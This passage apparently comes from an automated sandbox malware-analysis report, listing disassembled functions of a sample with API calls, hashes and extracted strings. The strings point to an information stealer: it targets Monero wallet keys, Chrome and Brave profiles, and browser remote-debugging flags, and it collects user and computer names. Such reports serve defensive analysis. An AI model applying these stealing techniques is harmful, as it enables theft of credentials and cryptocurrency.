                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 9e46fba198e00a99f3538a15d1d82ffe3ebec8626b56ee578ae6eaa8931d67d2
                                • Instruction ID: f64fb47748b1664cb885fea570a08df316d7bf422f079ef4828512cb715323ba
                                • Opcode Fuzzy Hash: 9e46fba198e00a99f3538a15d1d82ffe3ebec8626b56ee578ae6eaa8931d67d2
                                • Instruction Fuzzy Hash: A5E0CD7094530CFFE7246BA0DC0EB0C767C9B08B05F1000A4F7187A2C0C6F436804758
                                Function 00EA10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EA10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EA10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 128c938291ecaa2ee7b3eea3254385911fd443b3039a6c1aa4989c722162477c
                                • Instruction ID: 40330c267aa8feeb1e3e3e70b1fa8a327a0ab56079a8a1add3afaf2ac97def9e
                                • Opcode Fuzzy Hash: 128c938291ecaa2ee7b3eea3254385911fd443b3039a6c1aa4989c722162477c
                                • Instruction Fuzzy Hash: F9F08971641214BBE7189AB4AC99FAFB7ECE705705F301454F544E7380D571AE40D7A4
                                Function 00EA1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7AA0
                                  • Part of subcall function 00EB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7AA7
                                  • Part of subcall function 00EB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00EB7ABF
                                  • Part of subcall function 00EB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EA11B7), ref: 00EB7A10
                                  • Part of subcall function 00EB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7A17
                                  • Part of subcall function 00EB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EB7A2F
                                • ExitProcess.KERNEL32 ref: 00EA11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: ac5bcf4dfad4a5e9f947939e965ff27ec4a3595034a84b6e725369414b0e1187
                                • Instruction ID: aa8a03af817a267b3eda86db86da480e302722d8196f2cb9e09f67461c95b9fe
                                • Opcode Fuzzy Hash: ac5bcf4dfad4a5e9f947939e965ff27ec4a3595034a84b6e725369414b0e1187
                                • Instruction Fuzzy Hash: 57E0C7B990030153DE2473B0BC0BBAB36EC4B6938EF002824FA08B2742FE20F8418721

                                Non-executed Functions

                                Function 00EABE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00EC0B32,00EC0B2F,00000000,?,?,?,00EC1450,00EC0B2E), ref: 00EABEC5
                                • StrCmpCA.SHLWAPI(?,00EC1454), ref: 00EABF33
                                • StrCmpCA.SHLWAPI(?,00EC1458), ref: 00EABF49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAC8A9
                                • FindClose.KERNEL32(000000FF), ref: 00EAC8BB
                                Strings
                                • Google Chrome, xrefs: 00EAC6F8
                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 00EAC495
                                • Preferences, xrefs: 00EAC104
                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 00EAC3B2
                                • \Brave\Preferences, xrefs: 00EAC1C1
                                • --remote-debugging-port=9229 --profile-directory=", xrefs: 00EAC534
                                • Brave, xrefs: 00EAC0E8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-1869280968
                                • Opcode ID: 3bcf169285b89c0fd0d2d436ab7db801f022eaf09b87cffec732e96b71c8e565
                                • Instruction ID: 9c566b16124298587233dd6c8d351a10a3ee9bcdfd07ec54ed2245e8375737a3
                                • Opcode Fuzzy Hash: 3bcf169285b89c0fd0d2d436ab7db801f022eaf09b87cffec732e96b71c8e565
                                • Instruction Fuzzy Hash: 0E520072910108ABCF14FB60DD96EEF73BDAB55304F4455B8B51A76181EE30AB48CFA2
                                Function 00EB3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00EB3B1C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB3B33
                                • lstrcat.KERNEL32(?,?), ref: 00EB3B85
                                • StrCmpCA.SHLWAPI(?,00EC0F58), ref: 00EB3B97
                                • StrCmpCA.SHLWAPI(?,00EC0F5C), ref: 00EB3BAD
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB3EB7
                                • FindClose.KERNEL32(000000FF), ref: 00EB3ECC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: f3ffc7df8987b3174f791be060a1a508f7ac4ade7adb8671e7996543ed5e0fd2
                                • Instruction ID: ba18fc8d51fab22bf6bba736934be03d8e60c5a4c7e43160a9f20d445a647bc5
                                • Opcode Fuzzy Hash: f3ffc7df8987b3174f791be060a1a508f7ac4ade7adb8671e7996543ed5e0fd2
                                • Instruction Fuzzy Hash: C0A151B1A002089BDB34DFA4DC89FEE73B9BB49300F044599F61DA6185EB719B84CF61
                                Function 00EB4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00EB4B7C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB4B93
                                • StrCmpCA.SHLWAPI(?,00EC0FC4), ref: 00EB4BC1
                                • StrCmpCA.SHLWAPI(?,00EC0FC8), ref: 00EB4BD7
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB4DCD
                                • FindClose.KERNEL32(000000FF), ref: 00EB4DE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 396791304653753620bdb630f81535ecb54182a4c48e7fb42a5fa46e80060fef
                                • Instruction ID: 9484390597061e852ddecc4954f7d9f96f79ee9791cf674bb6dfac755af47fd4
                                • Opcode Fuzzy Hash: 396791304653753620bdb630f81535ecb54182a4c48e7fb42a5fa46e80060fef
                                • Instruction Fuzzy Hash: B7614CB5900218ABCB34EBA0DD49FEA737CBB48700F00459CF619A6185EB71ABC5CF91
                                Function 00EB47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EB47D0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB47D7
                                • wsprintfA.USER32 ref: 00EB47F6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB480D
                                • StrCmpCA.SHLWAPI(?,00EC0FAC), ref: 00EB483B
                                • StrCmpCA.SHLWAPI(?,00EC0FB0), ref: 00EB4851
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB48DB
                                • FindClose.KERNEL32(000000FF), ref: 00EB48F0
                                • lstrcat.KERNEL32(?,01BFF750), ref: 00EB4915
                                • lstrcat.KERNEL32(?,01BFE7E0), ref: 00EB4928
                                • lstrlen.KERNEL32(?), ref: 00EB4935
                                • lstrlen.KERNEL32(?), ref: 00EB4946
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 7df191f926746b5ec4473447dfb16584a11bfa7768df29c22f8528dd4b46c3d2
                                • Instruction ID: f21d8ef353d1b4a2de32ef54374d960c3c4ed5295295f01a0acce22c2686f824
                                • Opcode Fuzzy Hash: 7df191f926746b5ec4473447dfb16584a11bfa7768df29c22f8528dd4b46c3d2
                                • Instruction Fuzzy Hash: 8A5166B59402189BCB28EF70DC89FEE77BCAB58300F405598F619A6185EB709BC4CF91
                                Function 00EB40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00EB4113
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB412A
                                • StrCmpCA.SHLWAPI(?,00EC0F94), ref: 00EB4158
                                • StrCmpCA.SHLWAPI(?,00EC0F98), ref: 00EB416E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB42BC
                                • FindClose.KERNEL32(000000FF), ref: 00EB42D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: dc6c63843ef5ad3942409c54b56d8fd34c7c967b029e1abf0462063974409362
                                • Instruction ID: 380fef3419cefa44506e7b82c52f0ff24a418306faf867908f6e12565580a1b2
                                • Opcode Fuzzy Hash: dc6c63843ef5ad3942409c54b56d8fd34c7c967b029e1abf0462063974409362
                                • Instruction Fuzzy Hash: 8B514AB5900218ABCB28EBB0DD85EEA737CBB58300F4045DCF659A6185DB759BC5CF90
                                Function 00EAEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00EAEE3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EAEE55
                                • StrCmpCA.SHLWAPI(?,00EC1630), ref: 00EAEEAB
                                • StrCmpCA.SHLWAPI(?,00EC1634), ref: 00EAEEC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAF3AE
                                • FindClose.KERNEL32(000000FF), ref: 00EAF3C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: aa91abf6558b61808e2ef3d409efcfea2e50640429257ec3b23d4c6906a96974
                                • Instruction ID: 35b0ddc3ef786934ccabd5f5ae393cc6338230bbe6d1068f58c6d8c13537ab3e
                                • Opcode Fuzzy Hash: aa91abf6558b61808e2ef3d409efcfea2e50640429257ec3b23d4c6906a96974
                                • Instruction Fuzzy Hash: D8E11072911218AADF54FB60CDA2EEF73B9AF54300F4455F9B41A72092EE306B89CF51
                                Function 00EE0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
